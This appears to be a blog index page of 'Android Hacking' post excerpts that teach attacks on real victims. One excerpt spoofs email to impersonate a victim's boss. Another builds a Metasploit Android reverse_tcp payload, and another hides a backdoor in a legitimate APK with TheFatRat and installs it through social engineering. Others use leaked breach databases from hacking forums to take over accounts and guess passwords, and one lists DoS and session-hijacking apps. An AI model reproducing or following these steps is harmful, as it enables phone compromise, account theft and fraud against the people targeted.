Skip to main content

Posts

Showing posts with the label Android Hacking

EMAIL SPOOFING

  Email  Spoofing Intro:- This is a very handy method and it comes pre-installed in Kali Linux and all you need to do is to create an SMTP server to send emails. This is very useful and can use the server free of cost or if you are interested you can upgrade it to premium but I prefer the free version of it. By this method, you can send an email to your friend by using his own mail.id. SO, let's Dive in  Requirements:- Kali Linux SMTP server Mail.ID of victim Mail.ID of the victim's boss or friends Procedure:- create an SMTP server by using Sendinblue.com  it's free of cost and used by many marketers.  sign-in page of Sendinblie.com After creating an account successfully enter your details like company name, address, No-of employees, etc but do not forget to give your original phone number because it sends an OTP.   So, after finishing all the required formalities and finish setting up now go to the transactional section and check your SMTP server, port, us...

HOW TO HACK ANDROID USING PAYLOAD

  CREATING A PAYLOAD USING METASPLOIT Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal. In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is   Metasploit Framework. It is one of the best framework among all the frameworks. What is Metasploit Framework ? The  Metasploit Framework  is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms.  Metasploit  is one of the most commonly used penetration testing tools and comes built-in to  Kali Linux .       Requirements: 1. Pc with Kali Linux installed in it.    Lets get started: 1. Now open your Kali Linux Terminal ! 2. Use the following Command to create a payload using Metasploit:      sudo msfvenom -p android/meterpreter/reverse_tcp            ...

Embed Backdoor in any Android app | Android Hacking | Tricky Hash |

  H OW TO  CREATE A ANDROID TROJAN INTRO Everybody  install and use apps these days. So, the easiest way to hack a android by embed a Backdoor to a normal apk File. Now, install this apk file in your Victim's phone by using some Social Engineering trick.  When it is executed the user will see a normal app but in the same time our Backdoor will be running in the Background. REQUIREMENTS A Legitimate android apk file. Kali Linux  The FATRAT (Linux Tool) PROCEDURE   To embed Backdoor in any legitimate apk, we use fatrat. We have to install Fatrat in out terminal. Fatrat is used to generate local or remote listeners. It can generate payloads in various formats.  To Install Fatrat we'll have to use the following commands:  git clone  https://github.com/Screetsec/TheFatRat.git After cloning into TheFatRat now type: ls (enter) cd TheFatRat (enter) ls (enter) chmod +x setup.sh (enter) ls (enter) ./setup.sh (enter) It will automatically install all th...

Two Methods to Crack Password | Password Cracking |

    " Hacking password " is a quirky term used by teenager who want revenge or password of their girlfriend's social media but   " Hacking password " has more to it .There are some people who has " Hacking password " as there professional (obviously it's self proclaimed).Here is the list of accounts you can get : Netflix Spotify Instagram Hulu Facebook Google...etc Now here are 2 methods to help you to start with " Hacking password " Method 1: Database scraping REQUIREMENTS-   Target's Email/Username Step 1:  Go to this website  here . Step 2: Enter Email/Username & click on pwned? Now if you get Green screen that means you can't use this method, don't worry you can try 2nd method If you get Red screen, you are good to go. Step 3: Now you will see sites who's data has been leaked  Step 4: Go to hacking forums & get that data base Step 5: Now search for that Email/Username in it. Step 6: Voila! You just got acc...

How to Hack a Website with Basic HTML Coding| Websites

Today i will teach you how to access a website's source HTML in order to attempt to find login information. While you can access HTML for most websites in most browsers, virtually no websites store administrator passwords or other login details in the HTML, and any website which does is most likely still in the early stages of development. Warning - This Method doesn't work most of the Websites because they are advanced now. If it is vulnerable for this then you can only use this method.  Step 1. Open the site you want to  hack . Step 2. Go to the "Login" section. If the website has a dedicated login section, click the Log In or Sign In link to go to it.  Step 3. Open the website's source code. Each browser has a different way of doing this from the menu, but the easiest way to view your website's HTML code is by pressing either Ctrl+U (Windows) or ⌘Command+U (Mac). This will open a new tab with the website's source code displayed. Step 4. Open the ...

How to Guess any Password like Hackers Do | Password Cracking | Ethical Hacking |

In this article, I am going to tell you how Hackers and Crackers crack the password by Guessing. After reading this, you will be able to start think like a hacker. They use some methodologies while guessing and cracking passwords. So let's dive into it:  1. Guess the most common passwords At the end of every year, a list of the 25 most common passwords is released. These passwords are the easiest to guess and thus the most commonly hacked. Though you should avoid picking any of these passwords for yourself, try guessing from this list of passwords: 123456@  12345678  abc123  qwerty  monkey  letmein  dragon  baseball iloveyou  trustno1 1234567  sunshine  master  123123  welcome  shadow  Ashley  football  Jesus  Michael  ninja  mypassword  password1 2. Use some common password tricks  Other than guessing the most obvious passwords, there are a some tricks that are used by hackers....

Android Hacking Applications

Android hacking application 1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3. Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4. Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its go...